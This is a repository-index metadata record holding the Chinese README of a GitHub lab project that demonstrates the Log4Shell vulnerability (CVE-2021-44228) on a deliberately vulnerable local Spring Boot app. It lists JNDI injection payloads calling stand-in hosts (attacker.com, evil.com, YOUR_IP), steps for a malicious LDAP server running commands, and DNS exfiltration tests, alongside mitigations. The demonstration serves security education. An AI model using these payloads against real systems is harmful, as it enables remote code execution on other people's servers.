{"id":34910550,"url":"https://github.com/mintimate/log4j2-bugmaker","last_synced_at":"2026-03-17T17:01:55.370Z","repository":{"id":321184474,"uuid":"1084827717","full_name":"Mintimate/log4j2-bugmaker","owner":"Mintimate","description":"Demo of CVE-2021-44228 Log4Shell.","archived":false,"fork":false,"pushed_at":"2025-10-28T08:10:48.000Z","size":18,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"main","last_synced_at":"2025-12-27T21:09:54.354Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"HTML","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Mintimate.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2025-10-28T08:07:49.000Z","updated_at":"2025-10-28T08:10:51.000Z","dependencies_parsed_at":"2025-10-28T10:09:42.018Z","dependency_job_id":"c9aadc07-6d3a-41db-8a1c-47cfba1776cb","html_url":"https://github.com/Mintimate/log4j2-bugmaker","commit_stats":null,"previous_names":["mintimate/log4j2-bugmaker"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/Mintimate/log4j2-bugmaker","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Mintimate%2Flog4j2-bugmaker","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Mintimate%2Flog4j2-bugmaker/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Mintimate%2Flog4j2-bugmaker/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Mintimate%2Flog4j2-bugmaker/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Mintimate","download_url":"https://codeload.github.com/Mintimate/log4j2-bugmaker/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Mintimate%2Flog4j2-bugmaker/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30627664,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-17T14:16:03.965Z","status":"ssl_error","status_checked_at":"2026-03-17T14:16:03.380Z","response_time":56,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2025-12-26T11:07:58.634Z","updated_at":"2026-03-17T17:01:55.365Z","avatar_url":"https://github.com/Mintimate.png","language":"HTML","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Log4j2-BugMaker\n\n## CVE-2021-44228 Log4Shell 漏洞演示项目\n\n这是一个用于学习和研究 Log4j2 远程代码执行漏洞（Log4Shell）的演示项目。\n\n## ⚠️ 安全警告\n\n**此项目仅用于安全研究和教育目的，请勿在生产环境中使用！**\n\n本项目使用了存在严重安全漏洞的 Log4j 2.14.1 版本。\n\n## 📋 环境配置\n\n- **Spring Boot**: 2.6.1\n- **Log4j2**: 2.14.1 (易受攻击版本)\n- **Java**: 8 (JDK 1.8)\n\n## 🚀 快速开始\n\n### 1. 编译项目\n\n```bash\n./mvnw clean package\n```\n\n### 2. 运行应用\n\n```bash\n./mvnw spring-boot:run\n```\n\n或者：\n\n```bash\njava -jar target/log4j2-bugmaker-0.0.1-SNAPSHOT.jar\n```\n\n### 3. 访问应用\n\n打开浏览器访问：http://localhost:8080\n\n## 🎯 漏洞端点\n\n### 1. User-Agent 头注入\n\n```bash\ncurl -H \"User-Agent: \\${jndi:ldap://attacker.com/a}\" http://localhost:8080/api/log\n```\n\n### 2. 查询参数注入\n\n```bash\ncurl \"http://localhost:8080/api/search?query=\\${jndi:ldap://attacker.com/a}\"\n```\n\n### 3. 健康检查（无漏洞）\n\n```bash\ncurl http://localhost:8080/api/health\n```\n\n## 💡 漏洞原理\n\nLog4Shell (CVE-2021-44228) 是 Apache Log4j2 中的一个严重漏洞。当应用程序记录包含特殊格式字符串的用户输入时，Log4j2 会解析 JNDI 查找表达式，攻击者可以利用此特性执行远程代码。\n\n### 攻击载荷示例\n\n```\n${jndi:ldap://evil.com/a}\n${jndi:rmi://evil.com/a}\n${jndi:dns://evil.com/a}\n```\n\n### 测试载荷（安全）\n\n```\n${java:version}\n${java:os}\n${env:PATH}\n```\n\n## 🔧 测试步骤\n\n1. 启动应用\n2. 发送包含 JNDI 表达式的请求\n3. 查看控制台日志，观察 Log4j2 的解析行为\n\n## 🛡️ 修复方案\n\n### 方案 1：升级 Log4j2 版本\n\n将 Log4j2 升级到 2.17.1 或更高版本：\n\n```xml\n\u003cproperties\u003e\n    \u003clog4j2.version\u003e2.17.1\u003c/log4j2.version\u003e\n\u003c/properties\u003e\n```\n\n### 方案 2：设置 JVM 参数\n\n```bash\n-Dlog4j2.formatMsgNoLookups=true\n```\n\n### 方案 3：移除 JndiLookup 类\n\n```bash\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\n```\n\n## 🚀 远程代码执行演示\n\n### 方法 1：使用提供的工具（推荐）\n\n```bash\n# 1. 运行自动化脚本\n./setup-exploit-server.sh\n\n# 2. 选择 JNDI-Injection-Exploit 工具\n# 3. 输入要执行的命令（如 whoami 或 cat /etc/hosts）\n# 4. 在另一个终端发送攻击载荷\n```\n\n### 方法 2：使用 Python LDAP 服务器\n\n```bash\n# 启动恶意 LDAP 服务器\npython3 simple-ldap-server.py \"whoami\"\n\n# 或执行其他命令\npython3 simple-ldap-server.py \"cat /etc/hosts\"\n\n# 在另一个终端发送攻击载荷\ncurl -H 'User-Agent: ${jndi:ldap://YOUR_IP:1389/Exploit}' http://localhost:8080/api/log\n```\n\n### 方法 3：DNS 外带验证（无需搭建服务器）\n\n```bash\n# 运行 DNS 外带测试脚本\n./test-dns-exfiltration.sh\n\n# 按提示操作，访问 dnslog.cn 获取子域名\n# 然后查看是否收到 DNS 查询请求\n```\n\n## 📚 参考资料\n\n- [CVE-2021-44228 详情](https://nvd.nist.gov/vuln/detail/CVE-2021-44228)\n- [Apache Log4j 安全公告](https://logging.apache.org/log4j/2.x/security.html)\n- [CISA 警告](https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-356a)\n- [JNDI-Injection-Exploit](https://github.com/welk1n/JNDI-Injection-Exploit)\n- [JNDIExploit](https://github.com/feihong-cs/JNDIExploit)\n\n## 📝 许可证\n\n本项目采用 [MIT License](LICENSE) 开源协议。\n\n**特别声明**：本项目仅用于教育和安全研究目的，使用者需自行承担使用风险。\n\n## ⚠️ 法律声明\n\n未经授权对他人系统进行渗透测试是违法行为！本项目仅用于：\n- 在自己的测试环境中学习\n- 经过授权的安全测试\n- 安全研究和教育目的\n\n请遵守当地法律法规，负责任地使用这些知识。\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmintimate%2Flog4j2-bugmaker","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmintimate%2Flog4j2-bugmaker","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmintimate%2Flog4j2-bugmaker/lists"}